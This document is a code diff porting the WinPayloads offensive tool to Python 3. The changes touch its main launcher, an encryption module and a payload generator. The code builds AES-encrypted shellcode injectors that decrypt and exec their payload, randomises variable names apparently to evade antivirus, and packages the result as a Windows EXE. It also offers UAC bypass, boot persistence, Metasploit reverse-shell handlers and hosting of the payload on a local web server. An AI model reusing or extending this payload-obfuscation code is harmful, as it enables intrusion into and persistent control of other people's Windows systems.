Python3

.gitignore

@@ -4,3 +4,4 @@ server.crt
 server.key
 /lib/sockets.py
 externalmodules
+install/pyinstaller

WinPayloads.py

@@ -1,49 +1,39 @@
-#!/usr/bin/python
-from lib.main import *
-from lib.payloadextras import *
-from lib.startmetasploit import *
-from lib.menu import *
+#!/usr/bin/python3
+from lib.menu import getAndRunMainMenu
+import blessed
+import sys
+import subprocess
+import os
 
 
-try:
-    from lib.psexecspray import *
-except:
-    print t.bold_red + "[!] Rerun the setup.sh" + t.normal
+t = blessed.Terminal()
 
-if not re.search('winpayloads', os.getcwd().lower()):
-    print t.bold_red + "[!!] Please Run From Winpayloads Dir" + t.normal
-    sys.exit(1)
 
 DIR = os.path.expanduser('~') + '/winpayloads'
 if not os.path.isdir(DIR):
     os.mkdir(DIR)
 
 
 try:
-    print t.bold_green + "Checking if up-to-date || ctr + c to cancel" + t.normal
+    print(t.bold_green + "Checking if up-to-date || ctr + c to cancel" + t.normal)
     gitrev = subprocess.check_output(['git', 'rev-parse', 'HEAD']).rstrip()
     gitlsremote = subprocess.check_output(['git', 'ls-remote', 'origin', 'master']).split()[0]
     if gitrev != gitlsremote:
-        updateornah = raw_input(t.bold_red + "Do you want to update WinPayloads? y/[n]: " + t.normal)
+        updateornah = input(t.bold_red + "Do you want to update WinPayloads? y/[n]: " + t.normal)
         if updateornah.lower() == "y":
-            p = subprocess.Popen(['git','pull'])
+            p = subprocess.Popen(['git', 'pull'])
             p.wait()
-            print t.bold_yellow + "Reload Winpayloads..." + t.normal
+            print(t.bold_yellow + "Reload Winpayloads..." + t.normal)
             sys.exit()
 except subprocess.CalledProcessError:
-    print  t.bold_red + "[!] No Connection to Github" + t.normal
+    print(t.bold_red + "[!] No Connection to Github" + t.normal)
 except KeyboardInterrupt:
     pass
 
-
-from lib.listener import StartAsync
-async = StartAsync()
-async.start()
-
 try:
     getAndRunMainMenu()
 except KeyboardInterrupt:
-    print t.bold_green + '\n[*] Cleaning Up\n' + t.normal
+    print(t.bold_green + '\n[*] Cleaning Up\n' + t.normal)
     subprocess.call(['rm *.rc'], shell=True,
                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
     subprocess.call(['rm *.ps1'], shell=True,

lib/encrypt.py

@@ -1,26 +1,28 @@
-import Crypto.Cipher.AES as AES
-import os
+from Crypto.Cipher import AES
+from Crypto.Random import get_random_bytes
+from base64 import b64encode, b64decode
 import random
 import string
-import requests
-from HTMLParser import HTMLParser
 import re
 import blessed
 
 t = blessed.Terminal()
 
+
 def randomVar():
     return ''.join(random.sample(string.ascii_lowercase, 8))
 
+
 def randomJunk():
     newString = ''
-    for i in xrange(random.randint(1, 10)):
+    for i in range(random.randint(1, 10)):
         newString += ''.join(random.sample(string.ascii_lowercase, random.randint(1, 26)))
     return newString
 
+
 def getSandboxScripts(sandboxLang='python'):
     sandboxScripts = ''
-    from menu import sandboxMenuOptions
+    from .menu import sandboxMenuOptions
     for i in sandboxMenuOptions:
         if sandboxMenuOptions[str(i)]['availablemodules']:
             payloadChoice = sandboxMenuOptions[str(i)]['payloadchoice']
@@ -32,7 +34,7 @@ def getSandboxScripts(sandboxLang='python'):
             rex = re.search('\*([^\*]*)\*.*\$([^\*]..*)\$', sandboxContent) # Regex is ugly pls help
             if rex:
                 originalString, scriptVariable, variableValue = rex.group(), rex.group(1), rex.group(2)
-                setVariable = raw_input(t.bold_green + '\n[!] {} Sandbox Script Configuration:\n'.format(payloadChoice) + t.bold_red + '[*] {}? [{}]:'.format(scriptVariable, variableValue)  + t.normal)
+                setVariable = input(t.bold_green + '\n[!] {} Sandbox Script Configuration:\n'.format(payloadChoice) + t.bold_red + '[*] {}? [{}]:'.format(scriptVariable, variableValue)  + t.normal)
                 if setVariable:
                     try:
                         int(setVariable)
@@ -42,47 +44,38 @@ def getSandboxScripts(sandboxLang='python'):
                 newString = scriptVariable + ' = ' + variableValue
                 sandboxContent = sandboxContent.replace(originalString, newString)
             sandboxScripts += sandboxContent
-    print sandboxScripts
     return sandboxScripts
 
 
 def do_Encryption(payload):
-    counter = os.urandom(16)
-    key = os.urandom(32)
+    key = get_random_bytes(16)
+    cipher = AES.new(key, AES.MODE_CTR)
 
-    randkey = randomVar()
-    randcounter = randomVar()
-    randcipher = randomVar()
-
-    randdecrypt = randomJunk()
     randshellcode = randomJunk()
     randbuf = randomJunk()
     randptr = randomJunk()
     randht = randomJunk()
-
     randctypes = randomJunk()
-    randaes = randomJunk()
 
-    try:
-        rawHTML = HTMLParser().unescape(requests.get('http://www.4geeks.de/cgi-bin/webgen.py').text)
-        randomPython = re.sub('<.*>', '', rawHTML).strip().replace('.','')
-    except:
-        print t.bold_red + '[!] No network Connection, random python not generated.' + t.normal
-        randomPython = 'if __name__ == \'__main__\':'
+    payload = payload.replace('ctypes', randctypes)
+    payload = payload.replace('shellcode', randshellcode)
+    payload = payload.replace('bufe', randbuf)
+    payload = payload.replace('ptr', randptr)
+    payload = payload.replace('ht', randht)
 
+    ct_bytes = cipher.encrypt(payload.encode())
+    nonce = b64encode(cipher.nonce).decode('utf-8')
+    ct = b64encode(ct_bytes).decode('utf-8')
 
-    encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
-    encrypted = encrypto.encrypt(payload.replace('ctypes',randctypes).replace('shellcode',randshellcode).replace('bufe', randbuf).replace('ptr', randptr).replace('ht',randht))
+    injector = "#!/usr/bin/env python3\n"
+    injector += "from Crypto.Cipher import AES\n"
+    injector += "from base64 import b64decode\n"
+    injector += "import ctypes as {}\n".format(randctypes)
+    injector += "key = {}\n".format(key)
+    injector += "ct = b64decode('{}')\n".format(ct)
+    injector += "nonce = b64decode('{}')\n".format(nonce)
+    injector += "cipher = AES.new(key, AES.MODE_CTR, nonce=nonce)\n"
+    injector += "pt = cipher.decrypt(ct)\n"
+    injector += "exec(pt.decode())"
 
-    newpayload = "# -*- coding: utf-8 -*- \n"
-    newpayload += "import Crypto.Cipher.AES as %s \nimport ctypes as %s \n" %(randaes, randctypes)
-    newpayload += getSandboxScripts('python')
-    newpayload += randomPython
-    newpayload += "\n\t%s = '%s'\n"% (randomVar(), randomJunk())
-    newpayload += "\t%s = '%s'.decode('hex') \n" % (randkey, key.encode('hex'))
-    newpayload += "\t%s = '%s'.decode('hex') \n" % (randcounter, counter.encode('hex'))
-    newpayload += "\t%s = '%s'\n"% (randomVar(), randomJunk())
-    newpayload += "\t%s = %s.new(%s , %s.MODE_CTR, counter=lambda: %s )\n" % (randdecrypt, randaes, randkey, randaes, randcounter)
-    newpayload += "\t%s = %s.decrypt('%s'.decode('hex')) \n" % (randcipher, randdecrypt, encrypted.encode('hex'))
-    newpayload += "\texec(%s)" % randcipher
-    return newpayload
+    return injector

lib/generatepayload.py

@@ -1,12 +1,16 @@
-from main import *
-from payloadextras import *
-from psexecspray import *
-from startmetasploit import *
-from generatepayload import *
-from menu import *
-from encrypt import *
-from stager import *
+from .startmetasploit import METASPLOIT
+from .main import Spinner, payloaddir, injectwindows, DoServe
+from .payloadextras import EXTRAS
+from .encrypt import do_Encryption
+import os
+import blessed
+import sys
+import time
+import string
+import random
+import subprocess
 
+t = blessed.Terminal()
 
 METASPLOIT_Functions = {
     'reverse': {
@@ -37,47 +41,50 @@
         'nclisten': METASPLOIT().nclisterner,
     }
 }
+
+
 def askAndReturnModules(shellcode, metasploit_type):
     if metasploit_type == 'nclistener':
         return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['nclisten'])
     else:
-        want_UACBYPASS = raw_input(t.bold_red + '[*] Try UAC Bypass(Only Works For Local Admin Account)?' + t.bold_red + ' y/[n]:' + t.normal)
+        want_UACBYPASS = input(t.bold_red + '[*] Try UAC Bypass(Only Works For Local Admin Account)?' + t.bold_red + ' y/[n]:' + t.normal)
         if want_UACBYPASS.lower() == 'y':
-            win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal)
+            win7orwin10 = input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal)
             if not win7orwin10:
                 win7orwin10 = "10"
             return (EXTRAS(shellcode).UACBYPASS(win7orwin10), METASPLOIT_Functions[metasploit_type]['uacbypass'])
 
-        want_ALLCHECKS = raw_input(t.bold_red + '[*] Invoke Priv Esc Checks? y/[n]:' + t.normal)
+        want_ALLCHECKS = input(t.bold_red + '[*] Invoke Priv Esc Checks? y/[n]:' + t.normal)
         if want_ALLCHECKS.lower() == 'y':
             return (EXTRAS(shellcode).ALLCHECKS(), METASPLOIT_Functions[metasploit_type]['allchecks'])
 
-        want_PERSISTENCE = raw_input(t.bold_red + '[*] Persistent Payload on Boot? y/[n]:' + t.normal)
+        want_PERSISTENCE = input(t.bold_red + '[*] Persistent Payload on Boot? y/[n]:' + t.normal)
         if want_PERSISTENCE.lower() == 'y':
             return (EXTRAS(shellcode).PERSISTENCE(), METASPLOIT_Functions[metasploit_type]['persistence'])
 
         return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['normal'])
 
-def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
-    from menu import clientMenuOptions
-    if len(clientMenuOptions.keys()) > 2:
-        from stager import clientUpload
+
+def GeneratePayload(ez2read_shellcode, payloadname, shellcode):
+    from .menu import clientMenuOptions
+    if len(list(clientMenuOptions.keys())) > 2:
+        from .stager import clientUpload
         if clientUpload(powershellExec=ez2read_shellcode, isExe=True, json='{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'):
             return True
 
     randoFileName = ''.join(random.sample(string.ascii_lowercase, 8))
     with open('%s/%s.py' % (payloaddir(), randoFileName), 'w+') as Filesave:
-        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
+        Filesave.write(do_Encryption(injectwindows % (ez2read_shellcode)))
         Filesave.close()
-    print '[*] Creating Payload using Pyinstaller...'
-
-    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.win32/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
+    print('[*] Creating Payload using Pyinstaller...')
+    pyinstallerLocation = os.path.dirname(__file__).replace('/lib', '/install/pyinstaller/pyinstaller.py')
+    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.win32/drive_c/Python37/python.exe', pyinstallerLocation,
                           '%s/%s.py' % (payloaddir(), randoFileName), '--noconsole', '--onefile'], env=dict(os.environ, **{'WINEARCH':'win32','WINEPREFIX':os.path.expanduser('~') + '/.win32'}), bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
     LOADING = Spinner('Generating Payload')
-    while p.poll() == None:
+    while p.poll() is None:
         LOADING.Update()
         time.sleep(0.2)
-    print '\r',
+    print('\r', end=' ')
     sys.stdout.flush()
 
     payloadstderr = p.stderr.read()
@@ -87,27 +94,29 @@ def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
     try:
         os.rename('dist/%s.exe' % randoFileName, '%s/%s.exe' % (payloaddir(), randoFileName))
     except OSError:
-        print t.bold_red + "[!] Error while creating payload..." + t.normal
-        print payloadstderr
+        print(t.bold_red + "[!] Error while creating payload..." + t.normal)
+        print(payloadstderr)
         return False
 
-    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), randoFileName) + t.normal
+    print(t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), randoFileName) + t.normal)
     CleanUpPayloadMess(randoFileName)
     DoPayloadUpload(randoFileName)
     return True
 
 
 def CleanUpPayloadMess(randoFileName):
+    print(payloaddir())
     os.system('rm dist -r')
     os.system('rm build -r')
     os.system('rm *.spec')
-    os.system('rm %s/%s.py' % (payloaddir(), randoFileName))
+    #os.system('rm %s/%s.py' % (payloaddir(), randoFileName))
+
 
 def DoPayloadUpload(payloadname):
-    from menu import returnIP
-    want_to_upload = raw_input(
+    from .menu import returnIP
+    want_to_upload = input(
         '\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ')
-    if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec':
-        DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
-    elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '':
-        FUNCTIONS().DoServe(returnIP(), payloadname, payloaddir(), port=8000, printIt = True)
+    #if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec':
+        #DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
+    if want_to_upload.lower() == 'y' or want_to_upload.lower() == '':
+        DoServe(returnIP(), payloadname, payloaddir(), port=8000, printIt=True)